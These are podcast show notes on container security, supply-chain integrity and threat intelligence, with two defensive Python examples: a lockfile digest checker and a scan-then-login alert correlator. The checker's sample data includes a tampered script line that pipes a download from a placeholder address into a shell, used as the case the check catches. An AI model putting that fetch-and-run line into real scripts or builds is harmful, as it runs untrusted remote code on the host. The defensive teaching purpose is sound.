In this episode we discuss security and threat intelligence in modern technology platforms, concentrating on how container and cloud environments change the technology supply chain and how to secure that change. Compliance and intelligence play a critical role in managing supply chain risk. Specifically, when developers commit and update code, we discuss why intelligence and compliance controls are critical to ensure that the code reaching production is what was intended, untampered, and complete.
Here are the 3 Topics We Cover in This Episode:
1) Containers and Virtualization Images Offer Repeatability But Also Potential for Compromise at Scale:
Containers let software developers set up an assembly line of repeatable, secure patterns, because the same image runs the same way wherever a compatible container runtime is available. However, the upstream effort to harden the container and choose the right base images and configurations has to be correct from the beginning, since every downstream build inherits it. Mistakes at that layer can lead to a compromised container, or to a compromise at the host OS level that affects every container on that host.
Containers do not carry their own kernel: the host kernel is shared, with modular application containers and services layered on top of it. Security practitioners must therefore be mindful of anything that can break out of a container, because the kernel is the boundary. Host OS-level hardening matters for the same reason: a kernel-level memory corruption flaw compromises the host and, with it, every dependent layer running on it.
2) Supply Chain Risk with Containers:
Supply chain risk in technology is challenging because developers generally borrow code from other developers and rarely check those libraries and dependencies for security issues. In addition, contractual agreements do not capture all the nuances of the supply chain pipeline. It is hard enough to know what is happening inside an enterprise network, let alone to understand the provenance and chain of custody of the code that enters it.
Security issues get injected into the end product when container changes do not follow a strict process. "Defense in Depth" is a classic security principle that applies to securing containers through application and configuration management. Other aspects, such as source control, a commit trail, and fingerprinting the different kinds of artifacts, act as integrity checks (checksums and signatures) that confirm the code being updated is the code that was reviewed.
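One way to implement the artifact fingerprinting described above, as an added example that is not from the episode or from any project it mentions: a lockfile that pins each artifact's SHA-256 digest at build time, and a check that refuses to deploy on a digest mismatch, a pinned artifact that is missing, or an artifact that was never pinned. The artifact names, their contents, the tampered helper script and the lockfile are all constructed for illustration.

```python
import hashlib
import hmac


def fingerprint(data: bytes) -> str:
    """Content fingerprint in the 'sha256:<hex>' form used for OCI image digests."""
    return "sha256:" + hashlib.sha256(data).hexdigest()


# Known-good artifact bytes as reviewed and recorded at build time
# (constructed sample content, not real packages).
GOOD_HELPER = b"#!/bin/sh\necho deploy ok\n"
GOOD_LIB = b"PK\x03\x04 libparse 1.4.2 sample wheel payload"

# Lockfile: artifact name -> pinned digest. 'old-plugin.so' is pinned but is
# no longer shipped; 'app-base.tar' (below) was never pinned at all.
LOCK = {
    "libparse-1.4.2.whl": fingerprint(GOOD_LIB),
    "helper.sh": fingerprint(GOOD_HELPER),
    "old-plugin.so": "sha256:" + "0" * 64,
}

# What the build actually fetched this time. helper.sh has been tampered with
# (constructed payload; the address is from the RFC 5737 documentation range).
FETCHED = {
    "libparse-1.4.2.whl": GOOD_LIB,
    "helper.sh": b"#!/bin/sh\necho deploy ok\ncurl -s http://203.0.113.5/p | sh\n",
    "app-base.tar": b"FROM alpine\nRUN adduser -D app\nUSER app\n",
}


def verify_lockfile(fetched: dict, lock: dict) -> dict:
    """Compare every fetched artifact against the lockfile.

    Returns name -> 'ok' | 'mismatch' | 'missing' | 'unpinned'.
    """
    report = {}
    for name, expected in lock.items():
        data = fetched.get(name)
        if data is None:
            report[name] = "missing"            # pinned, but not delivered
        elif hmac.compare_digest(fingerprint(data), expected):
            report[name] = "ok"
        else:
            report[name] = "mismatch"           # content changed since review
    for name in fetched:
        if name not in lock:
            report[name] = "unpinned"           # nobody reviewed this at all
    return report


def safe_to_deploy(report: dict) -> bool:
    """Deploy only if every artifact is pinned, present and unchanged."""
    return bool(report) and all(status == "ok" for status in report.values())


if __name__ == "__main__":
    result = verify_lockfile(FETCHED, LOCK)
    for name, status in sorted(result.items()):
        print(f"{status:9} {name}")
    print("deploy:", "allowed" if safe_to_deploy(result) else "BLOCKED")
```

The check is deliberately strict in all three failure directions: a changed artifact is the obvious case, but an artifact that silently disappears or one that arrives without ever having been pinned both mean the build no longer matches what was reviewed, and the deploy gate should treat them the same way.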
3) Threat Intelligence Fundamentals with Container Security:
A threat intelligence program needs to start by aligning with the business and the threats most prevalent for it. A banking site faces different threats than an e-commerce, gaming, or cryptocurrency exchange site. A threat intelligence program therefore needs to be modular enough to scale to many types of threats as the business grows.
More tactically, for containers, developers cannot tear down the environment every time a malicious actor scans it; little work would get done. However, if a threat intelligence team notices regularity or repeatability in scan attempts followed by authentication attempts against the environment, that pattern is worth alerting on, and those intelligence alerts are fruitful.
Intelligence programs show clear value in highly attacked industries (manufacturing, health care, retail, finance). The challenge is putting on blinders and assuming there is no way to be attacked other than what the regular threat intelligence blogs describe.
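The "scan followed by authentication attempts" pattern above, as an added detection example that is not from the episode or from any product it mentions: the code correlates firewall scan events and authentication failures per source address and raises one alert when a source probes several distinct ports and then starts trying to log in within a short window. The log format, the process names, the thresholds and the sample lines (with addresses from the RFC 5737 documentation ranges) are all constructed assumptions for illustration; a single probe with no follow-up, or login failures with no preceding scan, do not alert.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (syslog-like; not from the episode). A firewall
# emits SCAN events, sshd emits AUTH_FAIL events. 203.0.113.7 scans the SSH,
# Docker API and kubelet ports and then tries several logins; 198.51.100.4 is
# a one-off probe; 192.0.2.9 fails logins without ever scanning.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z fw SCAN src=203.0.113.7 dport=22
2024-05-01T10:00:04Z fw SCAN src=203.0.113.7 dport=2375
2024-05-01T10:00:09Z fw SCAN src=203.0.113.7 dport=2376
2024-05-01T10:00:20Z fw SCAN src=203.0.113.7 dport=10250
2024-05-01T10:01:05Z sshd AUTH_FAIL src=203.0.113.7 user=root
2024-05-01T10:01:09Z sshd AUTH_FAIL src=203.0.113.7 user=admin
2024-05-01T10:01:14Z sshd AUTH_FAIL src=203.0.113.7 user=docker
2024-05-01T10:05:00Z fw SCAN src=198.51.100.4 dport=22
2024-05-01T10:07:30Z sshd AUTH_FAIL src=192.0.2.9 user=deploy
2024-05-01T10:07:41Z sshd AUTH_FAIL src=192.0.2.9 user=deploy
2024-05-01T10:07:55Z sshd AUTH_FAIL src=192.0.2.9 user=deploy
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<proc>\S+) (?P<event>SCAN|AUTH_FAIL) src=(?P<src>\S+)(?P<rest>.*)$"
)

# Detection thresholds: tunable assumptions, not values from the episode.
MIN_PORTS = 3                  # distinct ports probed before we call it a scan
MIN_AUTH = 2                   # authentication attempts following the scan
WINDOW = timedelta(minutes=10)  # how long after the first probe we keep watching


def parse_line(line: str):
    """Parse one log line into a dict, or return None for lines we do not handle."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
    fields = dict(kv.split("=", 1) for kv in m["rest"].split())
    return {"ts": ts, "event": m["event"], "src": m["src"], **fields}


def correlate(log_text: str) -> list:
    """One alert per source that scanned >= MIN_PORTS distinct ports and then
    made >= MIN_AUTH authentication attempts within WINDOW of its first probe."""
    by_src = defaultdict(lambda: {"scan": [], "auth": []})
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        by_src[ev["src"]]["scan" if ev["event"] == "SCAN" else "auth"].append(ev)

    alerts = []
    for src, evs in by_src.items():
        if not evs["scan"]:
            continue                                  # login failures alone: another rule
        ports = sorted({int(e["dport"]) for e in evs["scan"]})
        if len(ports) < MIN_PORTS:
            continue                                  # background scanner noise
        first_scan = min(e["ts"] for e in evs["scan"])
        followups = [e for e in evs["auth"]
                     if first_scan <= e["ts"] <= first_scan + WINDOW]
        if len(followups) >= MIN_AUTH:
            alerts.append({
                "src": src,
                "ports": ports,
                "auth_attempts": len(followups),
                "users": sorted({e["user"] for e in followups}),
                "first_scan": first_scan.isoformat(),
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG):
        print(alert)
```

The value of the rule is in the ordering and the window: scans on their own are constant background noise against anything exposed to the internet, and a handful of failed logins on their own are usually a typo, but a source that enumerates the container runtime ports and then immediately starts guessing credentials is the sequence worth waking someone up for.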